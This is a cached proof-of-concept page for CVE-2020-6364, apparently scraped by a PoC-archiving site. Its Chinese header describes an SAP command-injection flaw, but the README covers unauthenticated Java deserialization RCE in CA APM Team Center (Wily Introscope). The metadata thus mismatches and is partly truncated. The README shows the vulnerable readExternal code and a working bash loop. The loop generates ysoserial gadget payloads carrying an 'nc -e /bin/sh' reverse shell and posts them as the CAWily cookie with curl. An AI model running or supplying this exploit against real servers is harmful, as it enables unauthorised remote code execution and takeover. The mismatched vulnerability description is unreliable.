CVE-2020-6364 PoC — SAP Solution Manager和SAP Focused Run 操作系统命令注入漏洞

Source

https://github.com/gquere/CVE-2020-6364

Associated Vulnerability

Title:SAP Solution Manager和SAP Focused Run 操作系统命令注入漏洞 (CVE-2020-6364)
Description:SAP Solution Manager和SAP Focused Run都是德国思爱普（SAP）公司的产品。SAP Solution Manager是一套集系统监控、SAP支持桌面、自助服务、ASAP实施等多个功能为一体的系统管理平台。该平台可以帮助客户建立SAP解决方案的生命周期管理，并提供系统监控、远程支持服务和SAP产品组件升级等功能。SAP Focused Run是一个数据中心和大客户系统运维管理方案(高容量监控,警报,诊断和分析的终极解决方案)。 SAP 存在安全漏洞，目前尚无此漏洞的相关信息，

Description

Remote code execution in CA APM Team Center (Wily Introscope)

Readme

# CVE-2020-6364
Remote code execution in CA APM Team Center (Wily Introscope).

[Original advisory](https://github.com/Onapsis/vulnerability_advisories/blob/main/2021/CVE-2020-6364/ONAPSIS-2021-0008-OS_Command_Injection_in_CA_Introscope_Enterprise_Manager.md)

A deserialization vulnerability in CA APM Team Center leads to unauthenticated remote code execution on the server.

When authenticating to the server a cookie is returned that starts with the infamous ```rO0``` string indicating a base64-encoded serialized object:
![](./cookie.png)

Although I haven't fully traced the problem statically, this probably is the vulnerable code:
```java
public class HttpRequestHeaderInfo implements Externalizable {
  public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {

    in.readInt();
    int numMapEntries = in.readInt();
    this.fRequestParameterMap = (numMapEntries == 0) ? Collections.EMPTY_MAP : new HashMap(numMapEntries);

    for (int i = 0; i < numMapEntries; i++) {
      this.fRequestParameterMap.put(in.readUTF(), in.readObject());
    }

    int numCookies = in.readInt();
    this.fCookies = (numCookies == 0) ? kNoCookies : new Cookie[numCookies];

    for (int j = 0; j < this.fCookies.length; j++) {
      this.fCookies[j] = new Cookie((String)in.readObject(), (String)in.readObject());
    }
  }
}
```

Notice that the parameter map and the cookie are deserialized using ```readObject()``` from the user input.

This is trivially exploited by identifying a suitable gadget in a for loop:
```bash
for gadget in AspectJWeaver BeanShell1 C3P0 Click1 Clojure CommonsBeanutils1 CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 CommonsCollections7 FileUpload1 Groovy1 Hibernate1 Hibernate2 JBossInterceptors1 JRMPClient JRMPListener JSON1 JavassistWeld1 Jdk7u21 Jython1 MozillaRhino1 MozillaRhino2 Myfaces1 Myfaces2 ROME Spring1 Spring2 URLDNS Vaadin1 Wicket1
do
    java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar $gadget "nc -e /bin/sh ..." | base64 -w0 > cookie
    payload=$(cat cookie)
    curl -s -k 'https://remoteserver/' -X POST -H "Cookie: CAWily=$payload"
done
```

The only payload that produced remote code execution for me was CommonsBeanutils. The embedded JAR is ```org.apache.commons_beanutils_1.9.2.1.jar``` and does indeed include a vulnerable gadget according to the [maven repository](https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils/1.9.2).

Thanks
======
Obligatory thanks to a special someone who had me double check the header.

File Snapshot


 [4.0K]  /data/pocs/6c65f475d3d8c618228dee556b0aea6e840ac88e
├── [198K]  cookie.png
└── [2.5K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!